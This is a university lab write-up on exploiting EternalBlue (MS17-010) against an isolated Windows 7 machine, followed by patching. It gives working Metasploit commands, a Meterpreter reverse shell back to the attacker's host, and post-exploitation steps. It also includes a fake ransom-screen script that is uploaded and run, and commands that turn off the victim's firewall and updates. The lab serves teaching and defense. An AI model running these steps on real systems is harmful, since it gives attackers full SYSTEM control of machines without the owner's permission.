## https://sploitus.com/exploit?id=68A71640-577C-524E-BF05-7C40B9834AAC
# EternalBlue Exploit Demonstration (MS17-010)

Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 system, achieving SYSTEM-level access via Meterpreter.

This project also simulates a WannaCry-style ransomware attack (SAFE DEMO) and demonstrates mitigation using the MS17-010 security patch.

---

## Module Information

**Module:** CSCM828 Security Vulnerabilities and Penetration Testing  

**Students:**
- Daniel Nicolas Rentapalli (2548048)  
- Ichhya Koirala (2607189)  

**University:** Swansea University  

---

## Resources & Downloads

1. **MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption**  
   https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

2. **KB4012212 (Windows 7 x64 Security Update)**  
   https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

3. **Kali Linux (Virtual Machines Download)**  
   https://www.kali.org/get-kali/#kali-virtual-machines

4. **Windows 7 SP1 Home Premium English x64 (ISO)**  
   https://archive.org/details/windows-7-home-prem-english

5. **VMware Workstation Pro**  
   https://www.vmware.com/products/desktop-hyper

---

## 1. Overview

This lab demonstrates:

- Remote exploitation of SMB vulnerability (MS17-010)
- Kernel-level access via EternalBlue
- Meterpreter session establishment
- Post-exploitation techniques
- WannaCry-style ransomware simulation (safe)
- Mitigation through patching

---

## 2. Lab Environment

### Requirements

- VMware Workstation / VirtualBox  
- Minimum 8GB RAM  

### Attacker Machine

- Kali Linux  
- Metasploit Framework  

### Victim Machine

- Windows 7 SP1 x64 (Unpatched)  

### Network

- Host-only / NAT (isolated environment)  
- Ensure both machines can communicate  

⚠️ This lab must be conducted in a fully isolated environment.

---

## 3. Victim Setup (Windows 7)

Run in Administrator Command Prompt:

### Disable Firewall

```
netsh advfirewall set allprofiles state off
```

### Verify SMB Port

```
netstat -an | findstr :445
```

### Disable Updates (for lab stability)

```
sc stop wuauserv
sc config wuauserv start= disabled
```

---

## 4. Attacker Setup (Kali Linux)

### Verify Connectivity

```
ping <VICTIM_IP>
nmap -p 445 <VICTIM_IP>
```

---

## 5. Exploitation Steps

### Step 1: Scan Target

```
nmap -p 445 --script smb-vuln-ms17-010 <VICTIM_IP>
```

Expected:
- Host is VULNERABLE

---

### Step 2: Run Exploit

```
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <VICTIM_IP>
set LHOST <KALI_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
```

---

### Step 3: Confirm Access

```
meterpreter > getuid
```

Expected:
```
NT AUTHORITY\SYSTEM
```

---

## 6. Post-Exploitation

```
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig
```

### Stable Migration

```
ps
migrate <PID>
```

---

## 7. WannaCry Simulation (SAFE DEMO)

### Create Payload (Kali)

```
cat > /tmp/wannacry64.bat <<'EOF'
@echo off
setlocal enabledelayedexpansion
rem Countdown length in seconds (the original value was lost in extraction; 60 is assumed)
set timeleft=60

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF
```

---

### Upload & Execute

```
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"
```

---

## 8. Mitigation (Patch Demonstration)

### Step 1: Download Patch

- Visit: https://www.catalog.update.microsoft.com/
- Search: **KB4012212 Windows 7 x64**
- Download the `.msu` file

---

### Step 2: Install Patch

```
wusa.exe KB4012212-x64.msu /quiet /norestart
```

---

### Step 3: Restart

```
shutdown /r /t 0
```

---

### Step 4: Verify Patch

```
systeminfo | findstr KB4012212
```

---

### Step 5: Re-run Exploit

Expected:
- Exploit fails
- No Meterpreter session

---

### Step 6: Verify with Nmap

```
nmap -p 445 --script smb-vuln-ms17-010 <VICTIM_IP>
```

Expected:
- NOT VULNERABLE

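A scripted version of the verification in Steps 4 and 6 from the defender's side, added here as an example and not part of the original lab: run on the Windows 7 host, it checks whether KB4012212 is recorded as installed, whether SMBv1 is still enabled in the LanmanServer registry parameters, whether any firewall profile is still off, and whether TCP 445 is listening. It assumes an elevated PowerShell 2.0 or later session on Windows 7 SP1 x64; the function name `Test-Ms17010Mitigation` is mine.

```powershell
# Added example (not part of the original lab): post-patch verification run on the Windows 7 victim.
# Assumes an elevated PowerShell 2.0+ session on Windows 7 SP1 x64; the function name is hypothetical.
function Test-Ms17010Mitigation {
    param([string]$Kb = 'KB4012212')   # MS17-010 security-only update for Windows 7 x64 (from the lab)

    # 1. Is the update installed? (Get-HotFix reads the same data as 'systeminfo | findstr KB...')
    $patched = [bool](Get-HotFix | Where-Object { $_.HotFixID -eq $Kb })

    # 2. Is SMBv1 still enabled on the server side? On Windows 7 this is the LanmanServer 'SMB1'
    #    DWORD; an absent value means enabled, which is the default that EternalBlue relies on.
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1 = (Get-ItemProperty -Path $params -ErrorAction SilentlyContinue).SMB1
    $smb1Enabled = ($smb1 -eq $null) -or ($smb1 -ne 0)

    # 3. Is the firewall still off on any profile (the lab's 'netsh advfirewall ... state off')?
    $fwOff = [bool]((netsh advfirewall show allprofiles state) -match 'State\s+OFF')

    # 4. Is TCP 445 still listening (the lab's 'netstat -an | findstr :445', automated)?
    $smbListening = [bool](netstat -an | Select-String ':445\s+\S+\s+LISTENING')

    $result = New-Object PSObject -Property @{
        PatchInstalled   = $patched
        Smb1Enabled      = $smb1Enabled
        FirewallOff      = $fwOff
        Port445Listening = $smbListening
    }

    # The host counts as mitigated only when the patch is present; disabling SMBv1 is defence in depth.
    if (-not $patched) {
        Write-Warning "$Kb not found: host is still exposed to MS17-010 over SMB"
    } elseif ($smb1Enabled) {
        Write-Warning 'Patched, but SMBv1 is still enabled; consider disabling it as well'
    } else {
        Write-Host 'MS17-010 mitigated: patch present and SMBv1 disabled'
    }
    return $result
}

Test-Ms17010Mitigation
```

`Get-HotFix` lists only updates recorded by name on the host; a Windows 7 system that received a later cumulative monthly rollup carries the MS17-010 fix without listing KB4012212 itself, so a `False` in `PatchInstalled` should be checked against the update history before concluding the host is unpatched.
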
---

## 9. Troubleshooting

| Issue | Solution |
|------|--------|
| Exploit fails | Check connectivity |
| No session | Disable firewall |
| Session dies | Retry exploit |
| No visible window | Migrate to explorer.exe |

---

## 10. Ethical Considerations

This project is conducted:

- On controlled lab machines only  
- In a fully isolated network  
- For educational purposes only  

Unauthorized use violates:

- UK Computer Misuse Act 1990  

---

## 11. Conclusion

This lab demonstrates:

- Real-world SMB exploitation using EternalBlue  
- SYSTEM-level compromise of Windows 7  
- Ransomware attack simulation (safe)  
- Importance of timely patching